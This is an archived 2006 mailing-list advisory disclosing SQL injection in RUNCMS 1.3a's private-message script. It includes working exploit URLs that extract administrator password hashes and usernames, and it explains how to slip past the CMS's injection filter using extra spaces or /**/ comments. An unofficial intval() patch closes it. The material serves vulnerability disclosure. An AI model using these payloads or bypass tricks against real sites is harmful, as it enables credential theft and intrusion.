| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 15 Feb 2006 21:00:15 -0800 (PST) From: h e <het_ebadi@...oo.com> To: support@...unia.com, bugs@...uritytracker.com, bugtraq@...urityfocus.com, "content-editor@...urityfocus.com" <content-editor@...urityfocus.com>, "editor@...urityfocus.com" <editor@...urityfocus.com>, "expert@...uriteam.com" <expert@...uriteam.com>, "news-editor@...urityfocus.com" <news-editor@...urityfocus.com>, "vuldb@...urityfocus.com" <vuldb@...urityfocus.com>, "vuln@...unia.com" <vuln@...unia.com>, "webmaster@...unia.com" <webmaster@...unia.com>, "webmaster@...urityfocus.com" <webmaster@...urityfocus.com> Subject: RUNCMS 1.3a SQL injection refrence: http://www.runcms.org/public/modules/forum/viewtopic.php?topic_id=4003&forum=18 http://hamid.ir/security/ ----------------------------------------------- RUNCMS 1.3a SQL injection Runcms Includes most things a webmaster would expect from a cms: downloads, links, tutorials section, polls, forums, news, faq, contact form, rss feeds, file uploads, blogging via xml-rpc, & more. Possibility to manage users as groups with module/block specific access permissions, and extend functioality via 3rd party module plug-ins and ... Original Author: The Xoops Project http://www.xoops.org http://www.runcms.org Credit: The information has been provided by Hamid Ebadi ( Hamid Network Security Team): admin[AT]hamid[o]ir The original article can be found at: http://hamid.ir/security/ Vulnerable Systems: tested on RUNCMS 1.3a and RUNCM 1.2 (and below ?) Detail :: Send Private Message The following URL can be used to trigger an SQL injection vulnerability in the pmlite.php [ but no error will disply ! ] http://localhost/modules/messages/pmlite.php?send=1&to_userid=-1[SQL INJECTION] http://localhost/modules/messages/pmlite.php?send=2&to_userid=-1 union select pass from runcms_users internal RUNCMS protection will block this request and redirect your browser to http://localhost/abuse.php and you will see this warning: " WARNING !!!!!! You were trying to abuse the system, a logfile was created ..." what is the problem ? Bypassing Protection : as i underestand RUNCMS just filter (union select) and (union all select) and ....! but they forgot (union select) ! exploit: http://localhost/modules/messages/pmlite.php?send=2&to_userid=-1%20union%20%20%20%20select%20pass%20from%20runcms_users%20where%20level=5 there is another way to bypass runcms internal protection simply add " /**/ " in your query exploit will be something like this : http://localhost/modules/messages/pmlite.php?send=2&to_userid=-1/**/union/**/select/**/uname/**/from/**/runcms_users%20where%20level=5/*hamid-network-security-team-http://hamid.ir Unofficial Patch: line 33 : pmlite.php $to_userid = !empty($_POST['to_userid']) ? $_POST['to_userid'] : $_GET['to_userid']; // Hamid Ebadi (hamid Network Security Team): patch for RUNCMS 1.3a and below . $to_userid=intval($to_userid); //add this line plz HAMID $send = $_POST['send']; Signature __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com
Powered by blists - more mailing lists